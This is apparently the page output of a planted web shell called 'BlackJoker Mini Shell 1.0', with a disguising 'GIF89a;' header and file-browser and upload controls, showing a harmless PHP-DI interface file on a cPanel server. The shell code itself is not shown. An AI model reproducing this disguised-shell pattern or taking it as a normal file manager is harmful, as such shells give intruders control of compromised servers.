GIF89a; Mini Shell

Mini Shell

Direktori : /opt/cpanel/ea-wappspector/vendor/php-di/php-di/src/Definition/
Upload File :
Current File : //opt/cpanel/ea-wappspector/vendor/php-di/php-di/src/Definition/ExtendsPreviousDefinition.php

<?php

declare(strict_types=1);

namespace DI\Definition;

/**
 * A definition that extends a previous definition with the same name.
 *
 * @author Matthieu Napoli <matthieu@mnapoli.fr>
 */
interface ExtendsPreviousDefinition extends Definition
{
    public function setExtendedDefinition(Definition $definition) : void;
}

./BlackJoker Mini Shell 1.0